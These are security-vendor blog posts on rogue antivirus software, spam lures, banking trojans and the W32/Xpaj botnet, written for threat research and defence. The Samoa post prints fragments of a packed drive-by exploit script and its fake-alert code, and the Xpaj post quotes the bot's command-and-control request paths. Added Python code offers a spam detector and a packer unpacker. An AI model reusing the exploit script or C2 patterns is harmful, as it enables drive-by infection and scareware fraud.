Take a look at the terms and conditions page of advanced-virus-remover2009 .com. (Visiting this site is bad for your health.)
Fake AV site

And also the customer service page of this extreme porn site (incest-related domain redacted for obvious reasons):
Incest Site

These are sites that announce new content frequently, but the 18 U.S.C. 2257 record-keeping statements say that the content is ineligible, as it was created prior to July 3, 1995. And they don’t ask for your date of birth when you sign up, either. (The signs are always there!)

…and one of the promotional affiliate networks for a network of porn sites:
affiliate networks

…and the world-renowned Data Backuper software from databackuper .com ;)
Data Backuper

These are old sites, so let’s be realistic here: it’s just a template. The bad guys are just lazy (or efficient, depending on your point of view) when it comes to their websites. As proof, if more were needed, advanced-virus-remover-2010 .com was registered a day or two ago and is exactly the same.
Fake AV site
(Old techniques die hard, eh? ;) )

The same group(s) are undoubtedly connected with the recent tsunami spam that’s spreading more fake-alert malware, given the overlap between the domains below and the hosts-file infection data in this detailed VIL entry: http://vil.nai.com/vil/content/v_162829.htm

Lastly let’s take a look at their most recent flurry of fake-AV/codec/crypto&porn domains.
(Again, don’t visit; just read.)


Quite a diverse set, eh? The pornographic content is managed somewhat separately, and I really don’t want to make extra work for our legal team with this one!

I doubt that’s all we’ll see this week. Passive DNS monitoring also shows that many of these are unused so far.

There will be more on this one, I’m sure.

Rogue AV Haunts Halloween

Festive search words are a favorite with scammers as a lure to their offerings, as my colleague David Marcus recently warned us in his post about Halloween-themed threats.

In recent research, we have found that search results for “scary halloween pumpkin designs” could lead users to a hijacked web page that hosts rogue security products.

Results for Halloween related keywords

Redirected page that has the link to malware

Upon clicking the hyperlink, the user sees a website hosted on xxx.allxxxxxshxxx.com. The site presents a fake “Windows Security Alert” window that is identical to the scam reported by McAfee Labs’ Avelino Rico Jr. in his recent blog. The “alert” warns visitors of fake infections and requires the victims to download a tool to remove them.

FakeAlert window

What happens after installing this tool is the same as many other rogue AV or FakeAlert stories we’ve reported. This malware is now detected as FakeAlert-JW Trojan.

Watch out for this and other malware during Halloween season, and keep your security products updated.

Trick or Treat With Spam and Malicious Screensavers

I have previously blogged that some of the most common techniques scammers and cybercriminals use are news events and holidays. Balloon Boy and the Windows 7 Launch are good examples. My colleague Sam Masiello’s blog on President Barack Obama’s Nobel Prize is another excellent example. With Halloween approaching rapidly, the tricks are already knocking on your inbox and at your browser’s window.

As usual, although the lure differs depending upon the news or event, these tricks lead to the usual suspects: fake products and pharmacy spam. Just think of it: Would you like some candy or Viagra for Halloween?

Halloween Viaga

Here’s another:

Holiday Scam Products

And our favorite with a holiday spin:

Canadian Halloween Pharmacy

Here are a few message subjects to fear:

Approved meds available without recipe!
A HORRIFYING HALLOWEEN SALE!
ONLY TILL 31OCTOBER HALLOWEEN SALE: 40% OFF ALL OUR SOFT USE THIS DISCOUNT CODE: HALL-6666
Biggest deal this halloween
Low prices for big enlargement
Halloween discount
Annual Halloween Sale

While searching for “Halloween screensavers,” I ran across more than a few questionable websites. The following was the fifth entry on the first Google results page! No worries, we already had it flagged through our SiteAdvisor technology:

Malicious Halloween Screensavers

Keep your security updated and search safely this week!

Let’s Play ‘Find the Errors’

I’m writing this blog to demonstrate how the bad guys are getting better each day, or not, depending on your point of view.

Once again our topic is Brazilian malware authors. Yes, the dumb ones I keep running up against.

One of the recent versions of the PWS-Banker Trojan being distributed via spam has an interesting feature. First, let’s recall how this malware usually spreads:

  • Spam with the common “click here to see photos/videos/statement/etc…” links
  • IM (MSN Messenger, Skype, etc.)

This version of PWS-Banker, besides grabbing passwords and screenshots, will also download Microsoft MSN Messenger. Or an app that at least looks like Messenger.

When you enter your username and password and click Enter, the app will exit. But in the background it will message all your contacts on your behalf, sending nice notes with links.

Now, let’s play The Seven Errors Game. Below are two MSN Messenger login screens. (One is in Portuguese and the other is in English, but that is not one of the errors.)

fake and real

Unfortunately I am not really being fair with you, because only one of the seven errors can be seen visually. The other six are found only by behavioral analysis.

Here are the answers, starting from the top and working downward.

spot_the_dumbs

1) The windows are different, and you can see the minimize/maximize/close buttons are different
2) The help icon is the same, but when you click on it, no option is clickable
3) The drop-down box for the login name doesn’t work
4) The status drop-down box doesn’t work
5, 6, 7) The check boxes don’t work

Next time something unexpected pops up on your screen, don’t enter your data right away. Check and recheck before you believe it’s real.

McAfee Labs Goes After Evil Maid

In her recent blog Joanna Rutkowska describes proof-of-concept code for attacking TrueCrypt system disk encryption. The blog also mentions that “the concept behind the Evil Maid Attack is neither new, nor l33t in any way.” However, because the PoC is now published, we expect script kiddies to jump on this opportunity and tweak the code to their advantage.

As always, to protect our customers we looked into a possible AV detection mechanism to alert users in case the system is compromised. Obviously an AV cannot prevent an Evil Maid attack, but alerting a user on the first reboot after such an infection can go a long way toward preventing data loss.

We now detect this proof-of-concept code as the Trojan PWS-EvilMaid!demo, due to its password-stealing capabilities. We will watch for any future variants that follow this trend. Here is a screenshot of McAfee alerting the user once the machine is infected. We recommend you reinstall TrueCrypt if you see this detection.

EvilMaid Detection

Protect what you value!

Balloon Boy Spam Drifts Through Town

It’s bad enough that we are subjected to apparently fake child-peril balloon shenanigans in the news (and I guess this was only to be expected), but it seems that spammers and scammers have latched onto Balloon Boy as a lure to sell pharmaceuticals. Given the amount of news the original story of Falcon Heene and the runaway balloon produced, and the subsequent news around the possible scam, it was too attractive a lure to be ignored.

As usual, though, despite the novelty of the news event itself, the spams lead to the same types of stuff:

Subject: Drama With Balloon (Exclusive)

All leading to the same fake “Canadian” pharmacy sites. (The Chinese registrant info for this one was only a few days old!):

Bogus Canadian Pharmacy Site

Common subjects to beware of include:

Little boy trapped in balloon
Boy-balloon-madness
balloon kid’s full story
Balloon boy died
Drama with balloon(exclusive)

Be careful what you click, and mind the news. It is often the lure the spammers look for.

My thanks to colleagues Adam Wosotowsky and Sam Masiello for the samples.

Windows 7 Beaten to the Punch by Spam

The release of Microsoft’s next major operating system, Windows 7, is at hand. It’s timely to remind everyone that we have seen Windows 7 spam for a few months. Anything on this scale from Microsoft is too big a lure for spammers and cybercriminals to ignore. (I would be stunned if they didn’t take advantage.)

We’ve seen subjects that include:

Microsoft Windows 7 special offers
Windows 7 SP 2
Windows 7 FAQ on release
Today’s Special Gateway Laptop + NEW Windows 7 & More Electronics Deals
Windows7 ultimate 86% off
Windows7 ultimate 57% off

We at McAfee Labs have noticed these throughout both September and October, with spikes as high as 1.88 percent of total spam. That might sound like a small number, but when you consider that daily spam volumes can reach 160 billion messages, it is not insignificant.

As always, stay aware of the trends the scams and spammers use to lure you in. Be safe and watch what you click!

I thank my colleague Adam Wosotowsky for the background data!

Cybercrime Organizations Turn to ‘Mafia-Style’ Structure

In Las Vegas during this month’s McAfee FOCUS 09 conference, I listened to various speakers in the Threats and Trends track. They explained how cybercrime is now managed by individuals who drive their groups according to highly professional business models.

One of the most interesting talks was given by my colleague Dirk Kolberg, who presented on Innovative Marketing, a Ukrainian scareware company that the Federal Trade Commission accused of running massive “scareware” schemes: alarming messages falsely claimed that scans had detected viruses, spyware, and illegal pornography on consumers’ computers. The U.S. District Court for the District of Maryland approved the FTC’s request to halt the company’s activities and freeze the assets of those behind the scams.

Dirk explained that Innovative had more than 600 employees in real offices, subsidiaries in countries such as India, Poland, Canada, the United States, and Argentina, and even customer call centers. He said the company received approximately 4.5 million order IDs in 11 months, or, in other words, US$180 million (at $40 each). Technical support, a professional website, and LinkedIn profiles for the company and its staff provided what appeared to be a legitimate front. Following its legal troubles, the company is now defunct, yet many employees have joined a new entity that has the same production targets.

The same day, my colleague Dmitri Alperovitch gave an overview of the cybercrime landscape in Eastern European countries. Like Dirk, Dmitri demonstrated the high level of organization within the cybercrime industry. The first example came from Romania, where the Bogdan Païu carding gang operated. Members were caught in the act and arrested in 2006 after they emptied the accounts of several hundred citizens of Brazil, Spain, Italy, and the United States.

Well organized and equipped with sophisticated cloning devices, they received the personal data from Russian accomplices. The counterfeiters spent the money diverted from ATMs on striptease clubs, luxury cars, luxury hotel accommodation, food, and fine drinks.

In the second part of his talk, Dmitri presented a timeline of events in the Eastern European carding underground:

He discussed CarderPlanet and its hierarchical structure, set up like a mafia (source for the following image: NICSA-FBI-SSA, Michael J. McKeown).

CarderPlanet was shut down in 2004, and the FTC complaint for the injunction against IMU dates from December 2008, but cybercrime gangs will always rise from their ashes.

Around Kyiv, the making of fake antivirus software still flourishes. The latest statistics on rogue antivirus, presented by Craig Schmugar and Anthony Bettini in their session, are unequivocal.

Recent news on carding and phishing demonstrates the size and the worldwide organization of today’s cybercrime gangs.

  • In France, about 70 individuals were recently indicted. They were “mules” who, via Western Union, sent the money they embezzled to Ukraine and Russia.
  • In France, a gang of Slovakian gangsters from Britain was under investigation after bank cards were used to take more than $480,000 from cash machines in northern France. Up to 50 Eastern Europeans descended on Calais from Dover early on September 11 before emptying cash points across the region. 34 were arrested, all using Barclays Bank cards. According to the police in Lille, a “Mafia-style” mastermind had used dozens of mules to empty machines at a range of banks.
  • This month in the United States, the FBI announced the results of Operation Phish Phry. After a two-year investigation, more than 50 individuals in California, Nevada, and North Carolina and nearly 50 Egyptian citizens have been charged with crimes including computer fraud, conspiracy to commit bank fraud, money laundering, and aggravated identity theft. The gang victimized hundreds and possibly thousands of account holders by stealing their financial information and using it to transfer about $1.5 million to bogus accounts they controlled. Here, too, the group was very organized, as demonstrated by a chart created with i2 Analyst’s Notebook by Gary Warner.

All these examples support the position that Dave DeWalt discussed during Wednesday’s general session: “The bad guys are getting organized. This is not the hacker in your basement. We’re talking about organized crime, organized terrorism, and organized warfare,” DeWalt said. Identity theft, phishing, and fake alerts all travel over the Net. Faced with these threats, large organizations deploy solutions from multiple vendors because the truth is that no single vendor can meet all of their security and compliance needs. But today’s security threats and economic challenges demand that products from multiple vendors interoperate to provide better protection, reduce operational costs, and streamline the compliance lifecycle. This is why at FOCUS 09 DeWalt also reaffirmed his support of the McAfee Security Innovation Alliance (SIA). He described it as the “NATO” of security software, a call for a universal architecture for security standards, and confirmed that McAfee is focused on improving partnerships and establishing an extended, broader community through this innovative technology-partnering program.

ASCII Art Spam Strikes Back

Spammers are always looking for techniques that can beat spam filters. We have seen various techniques for spamming, like obfuscating words, embedding text in images, spoofing URLs, abusing social networking sites, and many others, that help spam avoid getting caught.

One of these techniques is ASCII art, an artful way of representing an image using text characters. These representations first appeared long ago to overcome the limitations of computers in displaying graphics.

Example:

______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/

The clever thing is that each line consists of seemingly random _ and | characters, which do not resemble any part of the word REPLICA. If we take the entire picture into consideration, though, our eyes can read it as a word. Spammers take advantage of this to pass through spam filters and deliver their intended message.

Not only words are represented in this manner; even URLs can be displayed this way to avoid the blacklisting of the domains.

ASCII art spam is not limited to punctuation characters. It can use digits, letters, and combinations of both, which can make things even worse for certain spam filters:

dP""b8  88     db     88     88  dP"Y8
dP      88    dPYb    88     88 `bo
Yb      88   dP__Yb   88     88   `Y8b
 YboodP 88  dP""""Yb  88ood8 88  8bodP'

ASCII art spam example

In the email above we can see that the spammer is advertising a pharmacy product without using the respective words, yet still successfully conveys the message.
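As an added example (not McAfee’s filter, and no part of the original post), here is a Python heuristic that works on shape rather than on words or domains: it flags a message containing a run of lines made up almost entirely of tokens a human could not read as words, which catches both the stroke-character art and the letter/digit art quoted above. The sample messages are constructed for the example.

```python
"""Heuristic detector for ASCII-art spam.

Added example, not McAfee's filter. Instead of matching words or domains
(which the art deliberately avoids), it scores each line by how many of its
whitespace-separated tokens a human could read as a word; a run of several
lines with almost no readable tokens is treated as an ASCII-art block.
The sample messages below are constructed for the example.
"""
from __future__ import annotations

VOWELS = set("aeiou")


def is_wordlike(token: str) -> bool:
    """Letters only, with a vowel, in a normal case pattern (lower, UPPER, Title).
    Strokes like '|_/' and letter/digit mixes like 'dP""b8' or 'YboodP' fail."""
    if not token.isalpha():
        return False
    if not any(c in VOWELS for c in token.lower()):
        return False
    return token.islower() or token.isupper() or token.istitle()


def is_art_line(line: str, min_tokens: int = 3, max_word_ratio: float = 0.25) -> bool:
    """A line is art-like when it has several tokens but almost none are words."""
    tokens = line.split()
    if len(tokens) < min_tokens:
        return False  # blank lines, separators like '-----', short signatures
    words = sum(1 for t in tokens if is_wordlike(t))
    return words / len(tokens) <= max_word_ratio


def find_art_blocks(text: str, min_lines: int = 3) -> list[tuple[int, int]]:
    """Return (first, last) line indexes of each run of at least min_lines art-like lines."""
    blocks: list[tuple[int, int]] = []
    lines = text.splitlines()
    start = None
    for i, line in enumerate(lines + [""]):  # sentinel flushes a trailing run
        if is_art_line(line):
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_lines:
                blocks.append((start, i - 1))
            start = None
    return blocks


def is_ascii_art_spam(text: str) -> bool:
    return bool(find_art_blocks(text))


# Constructed sample modelled on the stroke-character art quoted above.
REPLICA_ART = r"""______    _____   ______    _       _____    _____     ___
| ___ \  |  ___|  | ___ \  | |     |_   _|  /  __ \   / _ \
| |_/ /  | |__    | |_/ /  | |       | |    | /  \/  / /_\ \
|    /   |  __|   |  __/   | |       | |    | |      |  _  |
| |\ \   | |___   | |      | |____  _| |_   | \__/\  | | | |
\_| \_|  \____/   \_|      \_____/  \___/    \____/  \_| |_/"""

# Constructed sample modelled on the letter/digit art quoted above.
PHARMA_ART = "\n".join([
    'dP""b8  88     db     88     88  dP"Y8',
    'dP      88    dPYb    88     88 `bo',
    'Yb      88   dP__Yb   88     88   `Y8b',
    ' YboodP 88  dP""""Yb  88ood8 88  8bodP\'',
])

SPAM_MESSAGE = "Best prices this week!\n\n" + PHARMA_ART + "\n\nClick the link to order."
HAM_MESSAGE = "Hi Bob,\n\nPlease review the attached report and send me your comments by Friday.\n\nThanks,\nAlice"

if __name__ == "__main__":
    for name, msg in [("replica", REPLICA_ART), ("spam", SPAM_MESSAGE), ("ham", HAM_MESSAGE)]:
        print(name, find_art_blocks(msg), is_ascii_art_spam(msg))
```

A production filter would use this as one feature among several, since legitimate mail (tables, signatures, code) can also contain a few art-like lines.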

We saw this spam technique some time back, but it had died off. Recently, however, we have seen an increase. McAfee customers are protected from this type of spamming technique.

Obama Nobel Prize Spam Links to Malware and Drive-By Attacks

Just when I thought we weren’t going to see any spam campaigns related to the recent announcement that United States President Barack Obama had been awarded the Nobel Peace Prize, I was proven wrong. Spammers rarely disappoint when a juicy news story hits. It’s like attracting flies to honey.

This spam campaign questions whether Obama deserved to win the prize and claims that the country is suffering significant fallout as a result. The email then asks users to click or copy/paste a link into their browsers that will direct them to a website where they can download more information.

Obama Nobel Prize Spam

If users click on the link, they are brought to a site where they see an image of Obama followed by a notification that their download will start shortly. Remember, users believe that they are going to be downloading a report on the unrest created by Obama’s acceptance of the award.

Obama Nobel Spam Site

Five seconds after the page loads, users are prompted to download the file Obama_NobelPrize.exe. That is not the end of the story, however. Because users might not want to download an executable file, there is an extra bit of fun embedded within this page. Located at the bottom of the page is a little snippet of encoded JavaScript that looks like this:

Encoded JS Script

Decoding this JavaScript reveals that the page also attempts to silently load an iframe hosted on the tokyopharmm.com domain. The iframe attempts to load a series of PDF exploits to inject a password-stealing Trojan onto the user’s PC. We currently identify this Trojan as Generic PWS.y!hv.i.

This is another example in which current news stories are used to lure users into downloading malware. It’s a popular tactic that is repeated over and over, and it continues to work because it keeps succeeding. Even if you think you are going to outwit the malware authors by visiting their website but not downloading files, the page could be executing JavaScript in the background. Those scripts open other pages/sites via invisible iframes, test your machine for zero-day vulnerabilities, and exploit them.

McAfee Labs and the International Spy Museum

Surrounded by a network of neon lights across the ceiling and walls of computer screens lit with grave headlines regarding our country’s digital dependence (drinking water, sewer systems, banks, government systems, all vulnerable to an electrical grid outage), I introduced my wife and my sixteen-year-old daughter to our latest McAfee endeavor: contributing to the new International Spy Museum exhibit “Weapons of Mass Disruption.”

Yes, you read that correctly. Your humble narrator is part of a museum exhibit.

Nestled on the corner of 8th and F Streets in Washington, D.C., the International Spy Museum has become a must-see in our nation’s capital. It speaks to our country’s tales of espionage and the ultimate currency, intelligence. Never has a place been better suited to educate its visitors about the cybersecurity threats facing our government, our businesses, and you and me.

As former national intelligence director Admiral Michael McConnell mentioned during the exhibit’s opening event, the Internet has created an unprecedented level of vulnerability.

These threats, which could bowl you over in their magnitude and frequency, are constantly evolving, morphing into ever-changing but equally lethal pieces of malware, as diverse and fluid as Web 2.0 itself. In the midst of that stuff is our office, littered with Red Bull and Twinkies, where I and many other McAfee Labs researchers garner an understanding of the dark side of cyberspace activity. You know the saying: keep your friends close but your enemies closer. It is this insight that yields information on breaking threats and a more holistic understanding of the black-hatted enemy.

So consider again the computer wall’s grave headlines in the exhibit: “The Pentagon’s IT system is probed 360 million times a day. Twitter crashed as a result of a denial of service attack against a Georgian proponent. Is our air traffic control system protected?”

The exhibit shouts the theme that we as an industry live and that I shared during my contribution interview. The threat is real. Even my daughter got a kick out of it.

McAfee Labs Releases October Spam Report

Cybercriminals are taking advantage of American concerns about healthcare by flooding the Internet with spam. According to our October Spam Report, 70 percent of global spam is now “Canadian” pharmacy spam, which takes advantage of fears of swine flu and the rising costs of Medicare and pharmaceuticals.

Spammers generate more than 150 billion spam messages daily; that’s enough to send everyone in the world more than 30 emails every day (including people without computers). Nearly 19 out of every 20 emails are spam, and cybercriminals are growing more sophisticated with their attacks. No brands seem to be safe, and this month’s report analyzes how spammers are abusing the brands of Monopoly, The Hollywood Reporter, and even the Jewish organization Chabad to distribute malware.

The report can be downloaded here.

Please Call My Virus This!

Occasionally when we analyze malware, we find hidden messages there. They can be as simple as “Hi” or some choice words that would probably cause this blog to be X-rated.

This trait is not new. And naturally we don’t make much of this habit, so that the malware writers don’t earn any extra fame.

Today I was checking a family of malware, and I found another of those messages: “HELLO ANTIVIRUS MAKERS! This is XXX! Please call this sh*t YYY! Cheerz :D”

Sorry, XXX. I can’t get excited about your lame YYY product. You’ll have to look elsewhere for your few minutes of fame.

    W32/Xpaj Botnet Growing Rapidly

    Two weeks ago I blogged about a new virus–W32/Xpaj–found in the wild by McAfee researchers and actively spreading around the world. Since then we have closely monitored the change in spread and severity of the virus, improved generic detection for future W32/Xpaj instances, and added cleaning and proper repair for all the files infected by the virus. Today I want to share more news related to this threat.

    Further analysis has revealed some interesting details about the malicious behavior of W32/Xpaj. The Virus is building a widespread “zombie” network, by taking control thousands of Internet-connected computers. The new botnet is in its infancy, although thousands of machines have been infected during last two weeks. The botnet infects computers around the world and has spread across many countries. The attacks are mostly aimed at enterprises, but they have now spread to consumer machines as well. Based on multiple characteristics and our own research, the virus is most probably the work of eastern European cybercriminals.

    Most bots are connected to a central location from where one machine can control the entire botnet. W32/Xpaj, on the other hand, deploys several control channels to communicate and control its bots. It employs the same techniques used by Srizbi and Conficker; that is, it uses randomly generated DNS names for backup control servers. Even though W32/Xpaj does not know where the control server is, it knows how to search for it, making it possible to predict which host is in use on a given day.

    To prevent botnet hijacking, W32/Xpaj accepts only digitally signed payloads and commands. The malware authors use a cryptographic hash (the MD5 algorithm) to validate the authenticity of any payload received from the control server.

    Our analysis has not revealed any cryptographic system protecting the payload itself, so there is a chance for a rival to take control of the entire botnet.

    The W32/Xpaj variants we analyzed use a sophisticated domain-generation algorithm to create and query the list of random domains starting on September 24. The virus first tries to resolve the domain name to an IP address. If that succeeds, it sends an HTTP request in the form of a string:

    /GET /up.php?a=g2&cm=15A91F71

    The malicious host responds with the path to a binary containing further instructions and code to be executed:

    http://[infected]/stamm/stamm.dat
    http://[infected]/plugin/plugin.dat

    The first binary containing malicious instructions has already been received by all W32/Xpaj-infected machines. The virus stores the downloaded encrypted binary in the Windows folder. After decryption, the malicious code executes and instructs the virus to gather information about the infected machine and report to the server, sending the victim’s IP address, machine name, host process, registry records, current home page, and even fonts and path variables.

    Every time an infected machine receives a payload and executes malicious code, a marker (a file with a random name) is created in the Windows folder, preventing the virus from executing the same payload twice.

    Botnets grow and evolve quickly. We measure them by the number of compromised computers under their control. However, proactive virus detection and following these simple recommendations will help prevent your computer from becoming a part of a botnet:

    • Keep your anti-virus software up to date
    • Apply all the latest security patches and keep your operating system up to date
    • Set up a firewall to block unauthorized access while you are connected to the Internet. Use strict firewall policies and allow only those connections–both incoming and outgoing–that are absolutely necessary for your business.

    Although many security vendors struggled to release new signatures and cleaning support for this virus, McAfee customers are already protected. You will hear a lot more from us in the coming months, so stay tuned and keep reading our blogs.

    Thanks to Abhishek Karnik, Rachit Mathur, Di Tian, Ivan Teblin, and Adrian Dunbar for their help in analyzing and defeating this threat.

    Malware and standards – is it possible?

    I am excited to be involved in the joint industry effort of defining an XML format that will allow for the rapid exchange of information between security companies. This work was done by the “Malware Working Group” operating as part of the “Industry Connections Security Group” (ICSG) and under the umbrella of the IEEE. If you Google for “IEEE” and “ICSG” you should have the link at the top of the list – IEEE ICSG.

    There were about 20 people from multiple security companies who contributed to the development of the proposal for the standard, and I am very pleased with the results. It is a simple, flexible and powerful format that is already being used by 4 anti-malware companies to transmit meta-data about the prevalence of malware in the field. Wider adoption of this meta-data sharing will replace the trivial malware sample exchange of the past with a real-time exchange of threat intelligence data. Communicating the relationships between malware samples, domains and IPs will open endless possibilities for improving the security of all Internet users.

    For example, it will allow us to describe the whole history of domains/IPs that were used by a specific malware writing group, which malware they hosted and even how the malware got installed onto users’ computers. And this can be expressed in an unambiguous way suitable for rapid automated analysis. In a word – it’s powerful!

    But there are huge benefits even in the trivial transmission of the simplest malware prevalence data:

    • If you are an anti-malware vendor you will be able to prioritize samples in your research queues.
    • If you are a testing organization you will be able to create more relevant test sets (for example, downgrade rare and old samples).
    • If you are an administrator you can submit consolidated field reports to anti-malware vendors and help make the Internet a safer place.

    Here is how a portion of the XML meta-data looks:

    XML meta-data

    If you are interested, the complete XML schema is available here, and if you want to get involved please get in touch with your current point of contact at McAfee Labs.

    Malware Authors Profit From Disasters

    McAfee Labs has discovered another attempt by ruthless malware authors to profit from disaster and tragedy.

    While searching for information on the earthquakes and tsunami that struck the islands of American Samoa on 29 September, I saw the following results from the Google search engine:
    searchsamoa

    Clicking on one of the links, which at first sight seem to be legitimate, would result in my machine displaying an alert for a possible infection:
    samoainfection

    What is actually happening behind the scenes of my browser (in this case Internet Explorer Version 8 on a patched Windows XP system) is that the link silently connects to a server hosted in Poland that loads an exploit obfuscated with the well-known Dean Edwards packer, which I covered in a blog last year.

    This is a snippet of the exploit being loaded:

    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('28 61={"174":35,"295":35,"297":35,"614":35,"298":35,"233":-1,"272":"\\36\\21\\19\\36\\21\\19\\36\\36<!---->\\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36203 755\\21\\19 \\21\\19\\36\\36\\36752 131 461\\21\\19\\36\\36\\36754 726 282 645\\21\\19\\36\\36\\36787 13 795\\21\\19 \\21\\19\\36\\36\\21\\19 \\21\\19 \\21\\19 \\36796 576\\21\\19 \\21\\19\\36\\36\\36325 794 576\\21\\19\\36\\36\\36325 181\\21\\19\\36\\36\\36572 181\\21\\19\\36\\36\\36<17 31=

    And this is a snippet of an interesting part of the unobfuscated version of the exploit:

    {kPromo.alerts.minimizeWindow();alert("Warning! Your PC is at risk of virus and malware attack. \r\n \r\nYour system requires immediate check!\r\nSystem Security will perform a quick and free scan of your PC for viruses and malicious programs.");kPromo.alerts.maximizeWindow()};kPromo.alerts.showWindow=
    function(e,c,b){if(!kPromo.instructions.property.isInstructionActive) if(kPromo.alerts.windows[e]==undefined){var a=(typeof(kPromo.alerts.windows.length)==undefined)?"alert_window_"+
    kPromo.alerts.windows.length:"alert_window_0";
    kPromo.alerts.windows[e]=kPromo.layouts.createLayer(a,c,b);kPromo.alerts.windows[e].foregroundContentLayer.appendChild
    (kPromo.document.getDocumentElementByID(e));
    kPromo.alerts.draggableItem.div=kPromo.alerts.windows[e].
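To read a script packed this way without handing it to eval(), an analyst can reverse the packer statically. The following is an added example in Python, not code from the original post or from FileInsight; it implements both the standard base-a token encoding of Dean Edwards' packer and the identity-encoder variant (e=function(c){return c}) seen in the snippet above, and the packed strings it is run on are constructed for the example.

```python
import re

# Added example, not code from the original post: static unpacker for Dean Edwards'
# p,a,c,k,e,d packer, so a packed script can be read without handing it to eval().

_JS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", "'": "'", '"': '"'}


def js_unescape(s: str) -> str:
    """Decode the escape sequences found inside a JS single-quoted string literal."""
    def repl(m):
        esc = m.group(1)
        if esc[0] in "xu":
            return chr(int(esc[1:], 16))
        return _JS_ESCAPES.get(esc, esc)
    return re.sub(r"\\(x[0-9a-fA-F]{2}|u[0-9a-fA-F]{4}|.)", repl, s, flags=re.S)


def encode_index(c: int, a: int) -> str:
    """Port of the packer's e(c): dictionary index -> base-`a` token (0-9, a-z, A-Z)."""
    prefix = "" if c < a else encode_index(c // a, a)
    c %= a
    if c > 35:
        return prefix + chr(c + 29)                       # 36..61 -> 'A'..'Z'
    return prefix + (str(c) if c < 10 else chr(c + 87))  # c.toString(36): 10 -> 'a'


def unpack(p: str, a: int, c: int, k: list, identity: bool = False) -> str:
    """Rebuild the original source from the packed arguments (p, a, c, k).

    identity=True mirrors the variant quoted in the post (e=function(c){return c}),
    where the token for dictionary index i is simply the decimal string of i.
    """
    token = str if identity else (lambda i: encode_index(i, a))
    # d[e(c)] = k[c] || e(c): an empty dictionary slot stands for its own token
    table = {token(i): (k[i] if i < len(k) and k[i] else token(i)) for i in range(c)}
    return re.sub(r"\b(\w+)\b", lambda m: table.get(m.group(1), m.group(1)), p)


_CALL_RE = re.compile(
    r"\}\('((?:[^'\\]|\\.)*)',\s*(\d+),\s*(\d+),\s*'((?:[^'\\]|\\.)*)'\.split\('\|'\)",
    re.S,
)


def unpack_eval_call(script: str) -> str:
    """Extract (p, a, c, k) from eval(function(p,a,c,k,e,d){...}('p',a,c,'k'.split('|'),...))."""
    m = _CALL_RE.search(script)
    if not m:
        raise ValueError("no p,a,c,k payload found")
    p, a, c = js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    k = js_unescape(m.group(4)).split("|")
    # The snippet in the post replaces the encoder with an identity function.
    identity = "e=function(c){return c}" in script
    return unpack(p, a, c, k, identity=identity)


# Constructed, harmless sample in the identity-encoder shape seen above (not the real payload).
SAMPLE_IDENTITY = (
    "eval(function(p,a,c,k,e,d){e=function(c){return c};/* loop trimmed */return p}"
    "('0 1=2.3(\"4\");1.5=\"6\"',10,7,"
    "'var|box|document|getElementById|status|innerText|ok'.split('|'),0,{}))"
)


def demo_identity() -> str:
    return unpack_eval_call(SAMPLE_IDENTITY)


def demo_standard() -> str:
    """Standard base-62 encoding: dictionary index 36 is the token 'A'."""
    k = ["var", "s", "unescape", "hi"] + [""] * 32 + ["alert"]
    return unpack('0 1=2("3");A(1)', 62, len(k), k)
```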

    The exploit in turn connects to a server hosted in China that downloads (with user interaction) an executable that turns out to be yet another variant of the fake anti-virus software Windows PC Defender. For details of that software, you can see a recently published VIL here.

    After just a few minutes of the malware running, information such as the Windows Product ID and the Windows License Key on the system are sent to a server hosted in Russia.

    stealing-info

    It’s amazing how fast and well-prepared malware authors are nowadays. They seize opportunities that arise to exploit not only our machines but also our trust and confidence in the news. They make use of well-known techniques (such as search-engine optimization) strengthened by people’s emotions toward world-wide tragic events that are followed by millions (who are themselves victims of a lesser tragedy).

    Rebranded Rogue Anti-Virus Strikes Again

    Recently, we analysed samples of a new fake anti-virus program that brands itself as Alpha Antivirus. This program uses the following filenames: alphaav.exe and msnaoladdon.dll.

    Alpha Antivirus is a new FakeAlert variant evolved from the Personal Antivirus family of rogue anti-virus software. Like many FakeAlert malware, Alpha Antivirus promotes itself through the use of pop-up web pages hosted on malicious websites. These web pages mimic a Windows Explorer folder and a Windows Security Alert dialog, and perform a free but fake online scanning of the affected system.

    online scanning

    The following domains were known to host the fake online-scanning web pages and the main executable of Alpha Antivirus:


    The software prompts the user to install Alpha Antivirus. Once executed, it launches fake scanning and reports multiple infections:

    Alpha AV

    Alpha AV

    It also displays misleading pop-up warnings on the Windows taskbar.

    Alpha AV

    Alpha AV

    This variant drops a copy of itself as %ProgramFiles%\AlphaAV\AlphaAV.exe and a msnaoladdon.dll component in the Windows System folder, and installs the DLL file as a browser helper object.

    (%ProgramFiles% refers to the Programs folder, for example, C:\Program Files.)

    AlphaAV.exe is detected as FakeAlert-DI, while msnaoladdon.dll is detected as FakeAlert-EQ.

    Frequently, we see abrupt changes in branding, filenames, and GUIs used by the same fake anti-virus programs. As more security vendors and researchers publish their findings about new rogue anti-virus programs, malware authors try to repackage their “products” with new brand names and filenames and try to use more obfuscation and encryption on their files in an attempt to avoid being recognised by users and in some cases evade detection by security vendors.

    Some known brand name and filename changes:

    1. From pav.exe + winexplorer.dll to personalav.exe + msxmlm.dll (Personal Antivirus), and again to alphaav.exe + msnaoladdon.dll (Alpha Antivirus)

    2. From frmwrk32.exe to winupdate.exe (Antivirus XP/Pro)

    3. From pcdef.exe + mousehook.dll + ntdll64.dll (WinPC Defender) to winav.exe + ieocx.dll + iehostcx32.dll (WinPC Antivirus)

    4. From Spyware Protect 2009 to Antivirus System Pro

    As a gentle reminder to all users: Avoid visiting untrusted websites, install anti-malware products only from trusted and legitimate sources, and update the DATs regularly.

    Blast from the past: Fresh wave of targeted attacks using PowerPoint

